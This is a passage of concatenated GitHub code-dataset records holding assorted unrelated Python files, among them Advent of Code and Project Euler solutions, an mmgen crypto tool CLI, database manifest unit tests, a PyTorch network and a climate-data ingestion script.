'cut_level'\")\n return sent\n\n def dataset_file(self, input_file, output_file):\n with open(input_file) as f:\n with open(output_file, 'w') as fo:\n for line in f:\n line = self.clean_sent(line)\n line = self.cut_sent(line)\n fo.write(line)\n fo.write('\\n')\n\n def dataset_dir(self, input_dir, output_dir):\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n for _, dirnames, filenames in os.walk(input_dir):\n for filename in filenames:\n input_path = input_dir + '/' + filename\n output_path = output_dir + '/' + filename\n self.dataset_file(input_path, output_path)\n","repo_name":"SUNCHAO1212/Custom-Module-for-Pytorch","sub_path":"data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4552691697","text":"with open('input-9.txt', 'r') as f:\n lines = f.readlines()\n\ngrid = []\nfor line in lines:\n grid.append([int(x) for x in line.strip()])\n\ndef get_adjacents(x, y):\n adjacents = []\n if y > 0:\n adjacents.append((y-1, x))\n if x > 0:\n adjacents.append((y, x-1))\n if y < len(grid)-1:\n adjacents.append((y+1, x))\n if x < len(grid[0])-1:\n adjacents.append((y, x+1))\n return adjacents \n\nlows = set()\nfor y in range(len(grid)):\n for x in range(len(grid[0])):\n val = grid[y][x]\n adjvals = [grid[y][x] for y, x in get_adjacents(x, y)]\n if val < min(adjvals):\n lows.add((x, y))\n\ndef build_basin(basin, x, y):\n adjacents = get_adjacents(x, y)\n val = grid[y][x]\n for adjy, adjx in adjacents:\n adjval = grid[adjy][adjx]\n if adjval < val or adjval == 9 or (adjx, adjy) in basin:\n continue\n basin.add((adjx, adjy))\n build_basin(basin, adjx, adjy)\n\ndef p2():\n basin_sizes = []\n for x, y in lows:\n basin = set()\n basin.add((x, y))\n build_basin(basin, x, y)\n basin_sizes.append(len(basin))\n\n big_basins = [x for x in sorted(basin_sizes)][-3:]\n print(big_basins)\np2()\n","repo_name":"saltisgood/AOC2021","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24499907969","text":"from .common import *\n\ndef make_cmd_help():\n\timport mmgen.tool\n\tdef make_help():\n\t\tfor bc in mmgen.tool.MMGenToolCmds.classes.values():\n\t\t\tcls_doc = bc.__doc__.strip().split('\\n')\n\t\t\tfor l in cls_doc:\n\t\t\t\tif l is cls_doc[0]:\n\t\t\t\t\tl += ':'\n\t\t\t\tl = l.replace('\\t','',1)\n\t\t\t\tif l:\n\t\t\t\t\tl = l.replace('\\t',' ')\n\t\t\t\t\tyield l[0].upper() + l[1:]\n\t\t\t\telse:\n\t\t\t\t\tyield ''\n\t\t\tyield ''\n\n\t\t\tmax_w = max(map(len,bc.user_commands))\n\t\t\tfs = ' {{:{}}} - {{}}'.format(max_w)\n\t\t\tfor name,code in sorted(bc.user_commands.items()):\n\t\t\t\tif code.__doc__:\n\t\t\t\t\tyield fs.format(name,\n\t\t\t\t\t\tpretty_format(\n\t\t\t\t\t\t\tcode.__doc__.strip().replace('\\n\\t\\t',' '),\n\t\t\t\t\t\t\twidth=79-(max_w+7),\n\t\t\t\t\t\t\tpfx=' '*(max_w+5)).lstrip()\n\t\t\t\t\t)\n\t\t\tyield ''\n\n\treturn '\\n'.join(make_help())\n\nopts_data = {\n\t'text': {\n\t\t'desc': 'Perform various {pnm}- and cryptocoin-related operations'.format(pnm=g.proj_name),\n\t\t'usage': '[opts] ',\n\t\t'options': \"\"\"\n-d, --outdir= d Specify an alternate directory 'd' for output\n-h, --help Print this help message\n--, --longhelp Print help message for long options (common options)\n-k, --use-internal-keccak-module Force use of the internal keccak module\n-p, --hash-preset= p Use the scrypt hash parameters defined by preset 'p'\n for password hashing (default: '{g.dfl_hash_preset}')\n-P, --passwd-file= f Get passphrase from file 'f'.\n-q, --quiet Produce quieter output\n-r, --usr-randchars=n Get 'n' characters of additional randomness from\n user (min={g.min_urandchars}, max={g.max_urandchars})\n-t, --type=t Specify address type (valid options: 'legacy',\n 'compressed', 'segwit', 'bech32', 'zcash_z')\n-v, --verbose Produce more verbose output\n-X, --cached-balances Use cached balances (Ethereum only)\n-y, --yes Answer 'yes' to prompts, suppress non-essential output\n\"\"\",\n\t'notes': \"\"\"\n\n COMMANDS\n\n{ch}\nType '{pn} help ' for help on a particular command\n\"\"\"\n\t},\n\t'code': {\n\t\t'options': lambda s: s.format(g=g),\n\t\t'notes': lambda s: s.format(\n\t\t\tch=make_cmd_help(),\n\t\t\tpn=g.prog_name)\n\t}\n}\n\ncmd_args = opts.init(opts_data,add_opts=['hidden_incog_input_params','in_fmt','use_old_ed25519'])\n\nif len(cmd_args) < 1:\n\topts.usage()\n\ncmd = cmd_args.pop(0)\n\nimport mmgen.tool as tool\n\nif cmd in ('help','usage') and cmd_args:\n\tcmd_args[0] = 'command_name=' + cmd_args[0]\n\nif cmd not in tool.MMGenToolCmds:\n\tdie(1,\"'{}': no such command\".format(cmd))\n\nargs,kwargs = tool._process_args(cmd,cmd_args)\n\nret = tool.MMGenToolCmds.call(cmd,*args,**kwargs)\n\nif type(ret).__name__ == 'coroutine':\n\tret = run_session(ret)\n\ntool._process_result(ret,pager='pager' in kwargs and kwargs['pager'],print_result=True)\n","repo_name":"totaltrader/mmgen","sub_path":"mmgen/main_tool.py","file_name":"main_tool.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"31757923400","text":"#Wildcard imports are a bad idea, so we import all individually\nfrom dml import search_by_all, search_by_title, search_by_author, search_by_date, insert_manifest, remove_manifest, update_manifest, search_manifest, add_file, remove_file, get_all_files, remove_all_files, get_file\n#Yes, we could do \n#from dml import *\n#but this is bad practice, as it is very easy to accadentially rebind something, and it is hard to tell where something came from\n#honestly, we should just use import dml then go dml.insert_manifest, but as this is a testing script, we can get away with it\n#in our buisness logic, it should be import dml, then dml.insert_manifest\n\nto_insert = {\n\t\"manifests\": {\n\t\t\"manifest\": {\n\t\t\t\"standardVersions\": \"ocdxManifest schema v.1\",\n\t\t\t\"id\": \"https: //datahub.io/dataset/iDas\",\n\t\t\t\"creator\": \"Ali Raza\",\n\t\t\t\"dateCreated\": \"2016 - 10 - 27\",\n\t\t\t\"comment\": \"First test manifest\",\n\t\t\t\"researchObject\": {\n\t\t\t\t\"title\": \"iDAS Manifest\",\n\t\t\t\t\"abstract\": \"Data collected at the Interdisciplinary Data Analytics and Search lab at the University of Missouri by Computer Science researchers and Data Scientists.\",\n\t\t\t\t\"dates\": {\n\t\t\t\t\t\"date\": {\n\t\t\t\t\t\t\"date\": \"2005 - 04 - 27\",\n\t\t\t\t\t\t\"label\": \"start\"\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t},\n\t\t\t\"privacyEthics\": {\n\t\t\t\t\"oversight\": {\n\t\t\t\t\t\"label\": \"No assertion\"\n\t\t\t\t}\n\t\t\t},\n\t\t\t\"informedConsent\": \"No assertion\",\n\t\t\t\"anonymizedData\": {\n\t\t\t\t\"label\": \"No assertion\"\n\t\t\t},\n\t\t\t\"privacyConsiderations\": \"No assertion\"\n\t\t},\n\t\t\"provenance\": {\n\t\t\t\"narrative\": \"The Interdisciplinary Data Analytics and Search (iDAS) lab is one of the many research labs operating out of The University of Missouri, Columbia. As the name implies, iDAS combines researcher across departments to achieve solutions to problems in academia. Founded in 2005 by Dr. Chi-Ren Shyu, iDAS researchers are primarily Computer Scientist, but the lab also works with Medical Doctors, Biologist, and Statisticans.\"\n\t\t},\n\t\t\"publications\": {\n\t\t\t\"publication\": \"No assertion\"\n\t\t},\n\t\t\"locations\": {\n\t\t\t\"location\": {\n\t\t\t\t\"url\": \"\",\n\t\t\t\t\"comment\": \"\"\n\t\t\t}\n\t\t},\n\t\t\"files\": {\n\t\t\t\"file\": {\n\t\t\t\t\"name\": \"iDAS - data.csv\"\n\t\t\t},\n\t\t\t\"format\": \".csv\",\n\t\t\t\"abstract\": \"Metadata for 5000 records collected\",\n\t\t\t\"size\": \"No assertion\",\n\t\t\t\"url\": \"No assertion\",\n\t\t\t\"checksum\": \"No assertion\"\n\t\t},\n\t\t\"permissions\": \"No assertion\"\n\t},\n\t\"dates\": {\n\t\t\"date\": {\n\t\t\t\"date\": \"2014 - 02 - 15\"\n\t\t},\n\t\t\"label\": \"Created\"\n\t},\n\t\"creators\": {\n\t\t\"creator\": {\n\t\t\t\"name\": \"Chi-Ren Shyu\",\n\t\t\t\"role\": {\n\t\t\t\t\"label\": \"Other\"\n\t\t\t}\n\t\t},\n\t\t\"type\": {\n\t\t\t\"label\": \"No assertion\"\n\t\t},\n\t\t\"contact\": \"cshyu@wikimedia.org\"\n\t}\n}\n\nto_replace = {\n\t\"manifests\": {\n\t\t\"manifest\": {\n\t\t\t\"standardVersions\": \"ocdxManifest schema v.1\",\n\t\t\t\"id\": \"https: //datahub.io/dataset/sociallyCompute\",\n\t\t\t\"creator\": \"Sean Goggins\",\n\t\t\t\"dateCreated\": \"2016 - 08 - 13\",\n\t\t\t\"comment\": \"Second test manifest\",\n\t\t\t\"researchObject\": {\n\t\t\t\t\"title\": \"Socially Compute Manifest\",\n\t\t\t\t\"abstract\": \"Data mined from socail networks for the purpose of consumer trend analytics.\",\n\t\t\t\t\"dates\": {\n\t\t\t\t\t\"date\": {\n\t\t\t\t\t\t\"date\": \"1992 - 03 - 11\",\n\t\t\t\t\t\t\"label\": \"start\"\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t},\n\t\t\t\"privacyEthics\": {\n\t\t\t\t\"oversight\": {\n\t\t\t\t\t\"label\": \"No assertion\"\n\t\t\t\t}\n\t\t\t},\n\t\t\t\"informedConsent\": \"no assertion\",\n\t\t\t\"anonymizedData\": {\n\t\t\t\t\"label\": \"No assertion\"\n\t\t\t},\n\t\t\t\"privacyConsiderations\": \"No assertion\"\n\t\t},\n\t\t\"provenance\": {\n\t\t\t\"narrative\": \"Socially Compute is an ongoing project aiming to analyze trends of everyday people to make meaningful connections.\"\n\t\t},\n\t\t\"publications\": {\n\t\t\t\"publication\": \"No assertion\"\n\t\t},\n\t\t\"locations\": {\n\t\t\t\"location\": {\n\t\t\t\t\"url\": \"\",\n\t\t\t\t\"comment\": \"\"\n\t\t\t}\n\t\t},\n\t\t\"files\": {\n\t\t\t\"file\": {\n\t\t\t\t\"name\": \"Socially Compute - sc.csv\"\n\t\t\t},\n\t\t\t\"format\": \".csv\",\n\t\t\t\"abstract\": \"Metadata for 15000 records collected over two decades\",\n\t\t\t\"size\": \"No assertion\",\n\t\t\t\"url\": \"No assertion\",\n\t\t\t\"checksum\": \"No assertion\"\n\t\t},\n\t\t\"permissions\": \"No assertion\"\n\t},\n\t\"dates\": {\n\t\t\"date\": {\n\t\t\t\"date\": \"2016 - 10 - 28\"\n\t\t},\n\t\t\"label\": \"Created\"\n\t},\n\t\"creators\": {\n\t\t\"creator\": {\n\t\t\t\"name\": \"Sean Goggins\",\n\t\t\t\"role\": {\n\t\t\t\t\"label\": \"Other\"\n\t\t\t}\n\t\t},\n\t\t\"type\": {\n\t\t\t\"label\": \"No assertion\"\n\t\t},\n\t\t\"contact\": \"sg@wikimedia.org\"\n\t}\n}\n\n#Insert the first test manifest\ntest = insert_manifest(to_insert)\nif(not test):\n print(\"Bad insert\")\nelse:\n print(\"Good insert\")\n\n#Ensure thata the manifest was inserted properly\nfound = search_manifest({})[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n print(\"Match\")\nelse:\n print(\"No Match\")\n\n#search by full title\nfound = search_by_title(\"iDAS Manifest\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"Full title match\")\nelse:\n\tprint(\"Unable to match by full title\")\n\n#partial search\nfound = search_by_title(\"iDAS\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"partial title match\")\nelse:\n\tprint(\"Unable to match by partial title\")\n\n#lower case search\nfound = search_by_title(\"idas\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"lower case title match\")\nelse:\n\tprint(\"Unable to match by lower case title\")\n\n#second part search\nfound = search_by_title(\"Manifest\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"second part of title match\")\nelse:\n\tprint(\"Unable to match by second part of title\")\n\n#bad search\nfound = search_by_title(\"iDAS Manafest\")\nif(found.count() != 0):\n\tprint(\"found a manifest that shouldn't exist\")\nelse:\n\tprint(\"Passed bad search test\")\n\n#search by full author, interior manifest\nfound = search_by_author(\"Ali Raza\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"Full author match, interior\")\nelse:\n\tprint(\"Unable to Full author match, interior\")\n\n#search by full author, exterior creator\nfound = search_by_author(\"Chi-Ren Shyu\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"Full author match, exterior\")\nelse:\n\tprint(\"Unable to Full author match, exterior\")\n\n#search by full author, interior manifest\nfound = search_by_author(\"AliRaza\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"Full author no spaces match, interior\")\nelse:\n\tprint(\"Unable to Full author no spaces match, interior\")\n\n#search by full author, exterior creator\nfound = search_by_author(\"Chi-RenShyu\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"Full author no spaces match, exterior\")\nelse:\n\tprint(\"Unable to Full author no spaces match, exterior\")\n\n#partial search, interior manifest\nfound = search_by_author(\"Raz\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"partial author match, interior\")\nelse:\n\tprint(\"Unable to partial author match, interior\")\n\n#partial search, exterior manifest\nfound = search_by_author(\"Ren\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"partial author match, exterior\")\nelse:\n\tprint(\"Unable to partial author match, exterior\")\n\n#lower case search, interior manifest\nfound = search_by_author(\"ali raza\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"lower case author match\")\nelse:\n\tprint(\"Unable to match by lower case author\")\n\n#lower case search, exterior manifest\nfound = search_by_author(\"chi-ren shyu\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"lower case author match\")\nelse:\n\tprint(\"Unable to match by lower case author\")\n\n\n#lower case search, interior manifest\nfound = search_by_author(\"ALI RAZA\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"upper case author match\")\nelse:\n\tprint(\"Unable to match by upper case author\")\n\n#lower case search, exterior manifest\nfound = search_by_author(\"CHI-REN SHYU\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"upper case author match\")\nelse:\n\tprint(\"Unable to match by upper case author\")\n\n#search by full author, interior manifest\nfound = search_by_author(\"Ali Raza\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"extra spaces author match, interior\")\nelse:\n\tprint(\"Unable to extra spaces author match, interior\")\n\n#search by full author, exterior creator\nfound = search_by_author(\"Chi-Ren Shyu\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"extra spaces author match, exterior\")\nelse:\n\tprint(\"Unable to extra spaces author match, exterior\")\n\n\n#bad search\nfound = search_by_author(\"iDAS\")\nif(found.count() != 0):\n\tprint(\"found a manifest that shouldn't exist\")\nelse:\n\tprint(\"Passed bad search test\")\n\n#date searches\n#search by full date, interior manifest\nfound = search_by_date(\"2005 - 04 - 27\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"Full date match, interior\")\nelse:\n\tprint(\"Unable to Full date match, interior\")\n\n#search by full date, exterior date\nfound = search_by_date(\"2014 - 02 - 15\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"Full date match, exterior\")\nelse:\n\tprint(\"Unable to Full date match, exterior\")\n\n#partial search, interior manifest\nfound = search_by_date(\"2005\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"partial date match, interior\")\nelse:\n\tprint(\"Unable to partial date match, interior\")\n\n#partial search, exterior manifest\nfound = search_by_date(\"2014\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"partial date match, exterior\")\nelse:\n\tprint(\"Unable to partial date match, exterior\")\n\n#no spaces case search, interior manifest\nfound = search_by_date(\"2005-04-27\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"no spaces date match\")\nelse:\n\tprint(\"Unable to match by no spaces date\")\n\n#no spaces search, exterior manifest\nfound = search_by_date(\"2014-02-15\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"no spaces date match\")\nelse:\n\tprint(\"Unable to match by no spaces date\")\n\n#extra spaces case search, interior manifest\nfound = search_by_date(\"2005 - 04 - 27\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"extra spaces date match\")\nelse:\n\tprint(\"Unable to match by no spaces date\")\n\n#extra spaces search, exterior manifest\nfound = search_by_date(\"2014 - 02 - 15\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"extra spaces date match\")\nelse:\n\tprint(\"Unable to match by no spaces date\")\n\n#bad search\nfound = search_by_date(\"2229\")\nif(found.count() != 0):\n\tprint(\"found a manifest that shouldn't exist\")\nelse:\n\tprint(\"Passed bad search test\")\n\n#Search by all tests\nfound = search_by_all(\"ali\")[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n\tprint(\"found from search by all\")\nelse:\n\tprint(\"did not find from a search by all\")\n\n#empty search\nfound = search_by_date(\"\")\nif(found.count != 0):\n\tprint(\"Empty search returns manifests\")\nelse:\n\tprint(\"Empty search did not return a manifest\")\n\n#Update to Second manifest\nfound = search_manifest({})[0] #reset\ntest = update_manifest(found['_id'], to_replace)\nif(not test):\n print(\"Bad update\")\nelse:\n print(\"Good update\")\n\n#Ensure good manifest update\nfound = search_manifest({})[0]\nif(found['creators']['contact'] == to_insert['creators']['contact']):\n print(\"Did not replace\")\nelif(found['creators']['contact'] == to_replace['creators']['contact']):\n print(\"Good Replace\")\nelse:\n printf(\"replace corruption\")\n\n#add a test file\nif(add_file(found['_id'], \"This a file that is a string\")):\n\tprint(\"Added string file\")\nelse:\n\tprint(\"Did not add string file\")\n\n#reset our internal manifest\nfound = search_manifest({})[0]\n\n#get the file we Added\nfound_file = get_file(found[\"file_ids\"][0])\nif(found_file):\n\tprint(found_file)\nelse:\n\tprint(\"We did not find any files\")\n\n#remove the file\nif(remove_file(found[\"_id\"], found[\"file_ids\"][0])):\n\tprint(\"We removed the string file\")\nelse:\n\tprint(\"We did not remove the string file\")\n\n#add several files\nif(add_file(found['_id'], \"This is the first sting file\")):\n\tprint(\"Added 1st string file\")\nelse:\n\tprint(\"Did not add 1st string file\")\nif(add_file(found['_id'], \"This is the second sting file\")):\n\tprint(\"Added 2nd string file\")\nelse:\n\tprint(\"Did not add 2nd string file\")\nif(add_file(found['_id'], \"This is the third sting file\")):\n\tprint(\"Added 3rd string file\")\nelse:\n\tprint(\"Did not add 3rd string file\")\nfound = search_manifest({})[0]\n\n#get the files\nfound_files = get_all_files(found[\"_id\"])\nif(found_files):\n\tfor found_file in found_files:\n\t\tprint(found_file)\nelse:\n\tprint(\"unable to get files\")\n\n\n#remove the manifest\ntest = remove_manifest(found['_id'])\nif(not test):\n print(\"Bad remove\")\nelse:\n print(\"Good remove\") \n","repo_name":"holtskinner/CS4320-FinalProject","sub_path":"Source/db/dml_unit_tests.py","file_name":"dml_unit_tests.py","file_ext":"py","file_size_in_byte":12831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2697896353","text":"items = [\n {\n 'product_name': 'laptop',\n 'price': 1000\n },\n {\n 'product_name': 'mouse',\n 'price': 50\n },\n {\n 'product_name': 'keyboard',\n 'price': 100\n }\n]\n\n# Cómo obtener sólo una lista con los precios?\nprices = list(map(lambda x: x['price'], items))\nprint(prices)\n\n# Cómo obtener sólo una lista con los nombres de los productos?\nnames = list(map(lambda x: x['product_name'], items))\nprint(names)\n\n# Modificar cada objeto agregándole la propiedad 'taxes' con el valor 0.19\ndef add_taxes(item):\n new_item = item.copy()\n new_item['taxes'] = new_item['price'] * 0.19\n return new_item\n\ndef calculate_total(item):\n new_item = item.copy()\n new_item['total'] = new_item['price'] + item['taxes']\n return new_item\n\n\nnew_items = list(map(add_taxes, items))\nprint('With taxes, before total: ', new_items)\n\nnew_items = list(map(calculate_total, new_items))\nprint('With taxes, after total: ', new_items)\n\nprint('Items originales: ', items)\n","repo_name":"rortizv/python_comprehensions_funciones_y_manejo_de_errores","sub_path":"12_map_dict.py","file_name":"12_map_dict.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16490459777","text":"# Faça um programa que leia uma data qualquer (dia, mês e ano) e calcule a data do próximo dia.\n# Lembre-se que em anos bissextos o mês de fevereiro tem 29 dias.\n# (Dica: um ano é bissexto quando for divisível por 4)\n\nimport datetime\n\n# get today\ndt_today = datetime.datetime.today().date()\ndt_today_add_day = dt_today + datetime.timedelta(days=1)\n\nprint(f'Hoje é {dt_today.strftime(\"%d/%m/%Y\")}')\nprint(f'Amanhã é {dt_today_add_day.strftime(\"%d/%m/%Y\")}')\n","repo_name":"dieissonmartins/snake-project","sub_path":"scripts/post-graduate/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23305276365","text":"#!/usr/bin/env python3\n\nimport csv\nimport os\n\nfrom common.common import CLIMATE_HISTORY_FIELDS\n\n\ndef load_climate_history(data_dir, file_type=\".csv\"):\n climate_history = []\n fields_count = len(CLIMATE_HISTORY_FIELDS)\n # Resursively check the dirs\n for root, _subdirs, files in os.walk(data_dir):\n # Looping through each file in the current dir\n for file in files:\n if file_type not in file:\n continue\n\n print(f\"Reading file: {file}\")\n\n station_name = file.replace(\"_\", \" \").lower()\n with open(\n f\"{root}/{file}\", newline=\"\", encoding=\"ISO-8859-1\"\n ) as climate_file:\n rows = csv.reader(climate_file, delimiter=\",\")\n\n for row in rows:\n if not row:\n continue\n\n # Skip if not a data row\n if not row[0] or row[0].strip().lower() not in station_name:\n continue\n\n if len(row) != fields_count:\n raise Exception(\n f\"Error: Unexpected number of fields for the provided row: {row}\"\n )\n\n record = {}\n for index, field_name in enumerate(CLIMATE_HISTORY_FIELDS):\n field_value = row[index].strip()\n if not field_value:\n field_value = None\n\n record[field_name] = field_value\n\n climate_history.append(record)\n\n print(\"Finished reading all files\")\n return climate_history\n\n\ndef ingest_climate_history(\n climate_history, es_client, BOMClimateHistory, init_index, batch=1000\n):\n \"\"\"\n Ingest the climate history data into ES\n \"\"\"\n # Create the mappings in ES\n if init_index:\n BOMClimateHistory.init()\n\n stations = es_client.get_all_stations_by_name()\n\n record_count = len(climate_history)\n buffer = []\n for index, record in enumerate(climate_history):\n station_id = None\n station_coordinates = None\n station_details = stations.get(record[\"station_name\"])\n\n if station_details:\n station_id = station_details[\"id\"]\n station_coordinates = station_details[\"coordinates\"]\n\n document = BOMClimateHistory(\n # Required fields\n date=record[\"date\"],\n station_name=record[\"station_name\"],\n # Foreign fields\n station_id=station_id,\n station_coordinates=station_coordinates,\n # Data fields\n evapotranspiration=record[\"evapotranspiration\"],\n rain=record[\"rain\"],\n pan_evaporation=record[\"pan_evaporation\"],\n maximum_temperature=record[\"maximum_temperature\"],\n minimum_temperature=record[\"minimum_temperature\"],\n maximum_relative_humidity=record[\"maximum_relative_humidity\"],\n minimum_relative_humidity=record[\"minimum_relative_humidity\"],\n average_10m_wind_speed=record[\"average_10m_wind_speed\"],\n solar_rediation=record[\"solar_rediation\"],\n )\n\n buffer.append(document)\n\n # Reach the batch size or the last doc\n if not index % batch or index == record_count - 1:\n if not index:\n continue\n\n es_client.bulk_ingestion(buffer)\n buffer.clear()\n\n print(f\"Ingested {index+1} out of total {record_count} documents\")\n","repo_name":"blackinv1/bom_climate_history","sub_path":"src/data_etl/climate_history.py","file_name":"climate_history.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38301417","text":"from torch import nn\nimport torch\n\n\nclass Net(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.sequaltion = nn.Sequential(\n nn.Conv2d(1, 16, 3, 2, 1),\n nn.ReLU(),\n nn.BatchNorm2d(16),\n nn.Conv2d(16, 32, 3, 2, 1),\n nn.ReLU(),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, 3, 2, 1),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.Conv2d(64, 128, 3, 1, 1),\n nn.ReLU(),\n nn.BatchNorm2d(128),\n nn.Conv2d(128, 256, 3, 1, 1),\n nn.ReLU(),\n nn.BatchNorm2d(256),\n nn.Conv2d(256, 512, 3, 1, 1),\n nn.ReLU(),\n nn.BatchNorm2d(512),\n nn.Conv2d(512, 128, 3, 1, 1),\n nn.ReLU()\n )\n\n self.liner_layer = nn.Linear(128 * 4 * 4, 2)\n self.output = nn.Linear(2, 10)\n\n def forward(self, x):\n output = self.sequaltion(x)\n output = output.reshape(-1, 128 * 4 * 4)\n feature = self.liner_layer(output)\n y = self.output(feature)\n return feature, y\n\n\nif __name__ == '__main__':\n a = torch.randn(2, 1, 28, 28)\n net = Net()\n feature, y = net(a)\n print(feature.shape, y.shape)\n","repo_name":"852251748/practiceCode","sub_path":"DeepLearningStudy/MediateCourse/CenterLoss/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36172350587","text":"import numpy as np\n\n\ndef cylinder_area(r:float,h:float):\n \"\"\"Obliczenie pola powierzchni walca. \n Szczegółowy opis w zadaniu 1.\n \n Parameters:\n r (float): promień podstawy walca \n h (float): wysokosć walca\n \n Returns:\n float: pole powierzchni walca \n \"\"\"\n if r > 0 and h > 0 and (type(h) is float) and (type(r) is float):\n return 2 * np.pi * r * (r + h)\n else:\n x = float('nan')\n return x\n\ndef fib(n:int):\n \"\"\"Obliczenie pierwszych n wyrazów ciągu Fibonnaciego. \n Szczegółowy opis w zadaniu 3.\n \n Parameters:\n n (int): liczba określająca ilość wyrazów ciągu do obliczenia \n \n Returns:\n np.ndarray: wektor n pierwszych wyrazów ciągu Fibonnaciego.\n \"\"\"\n if (n < 1) or (type(n) != int):\n return None\n elif n == 1:\n return np.array([1], dtype = int)\n elif n == 2:\n return np.array([1, 1], dtype = int)\n else:\n lst = np.ndarray(shape = (1, n), dtype = int)\n lst[0][0:2] = 1, 1\n for i in range(2, n):\n lst[0][i] = lst[0][i-1] + lst[0][i-2]\n return lst\n\ndef matrix_calculations(a:float):\n \"\"\"Funkcja zwraca wartości obliczeń na macierzy stworzonej \n na podstawie parametru a. \n Szczegółowy opis w zadaniu 4.\n \n Parameters:\n a (float): wartość liczbowa \n \n Returns:\n touple: krotka zawierająca wyniki obliczeń \n (Minv, Mt, Mdet) - opis parametrów w zadaniu 4.\n \"\"\"\n m = np.array([[a, 1, -a], [0, 1, 1], [-a, a, 1]])\n mdet = np.linalg.det(m)\n mt = np.transpose(m)\n scr = float('NaN')\n if mdet == 0:\n return scr, mt, mdet\n else:\n return np.linalg.inv(m), mt, mdet\n\ndef custom_matrix(m:int, n:int):\n \"\"\"Funkcja zwraca macierz o wymiarze mxn zgodnie \n z opisem zadania 7. \n \n Parameters:\n m (int): ilość wierszy macierzy\n n (int): ilość kolumn macierzy \n \n Returns:\n np.ndarray: macierz zgodna z opisem z zadania 7.\n \"\"\"\n if (type(m) != int) or (type(n) != int) or (m < 0) or (n < 0):\n return None\n mat = np.zeros((m, n))\n for i in range(0, m):\n for j in range(0, n):\n if i <= j:\n mat[i][j] = j\n else:\n mat[i][j] = i\n return mat\n \n ","repo_name":"Smoku-creator/MetNum_Kacprzak","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16680796114","text":"def sum_3_5(n):\n if not n:\n return 0\n f3 = sum_arithmetic_series(3, 3, n)\n f5 = sum_arithmetic_series(5, 5, n)\n f15 = sum_arithmetic_series(15, 15, n)\n return f3 + f5 - f15\n\n\ndef sum_arithmetic_series(a, d, maximum):\n n = int(maximum / d)\n # subtract 1 if maximum is multiple\n if maximum % d == 0:\n n -= 1\n val_sub = n * (2 * a + d * (n - 1))\n # to avoid rounding error, do bitwise right-shift for a / 2\n val = val_sub >> 1\n return val\n\n\ndef hacker_rank():\n n_cases = int(input())\n for i in range(n_cases):\n max_i = int(input())\n print(sum_3_5(max_i))\n\n\ndef test():\n assert sum_3_5(10) == 23\n assert sum_3_5(100) == 2318\n assert sum_3_5(0) == 0\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"mattsteinpreis/hr","sub_path":"Contests/ProjectEuler/01-multiples-of-3-and-5.py","file_name":"01-multiples-of-3-and-5.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8220649357","text":"'''\nCreated on 2020-10-24\n\n@author: wf\n'''\nfrom lodstorage.sql import SQLDB\nfrom pathlib import Path\nimport sqlite3\nfrom collections import OrderedDict\nimport mailbox\nfrom 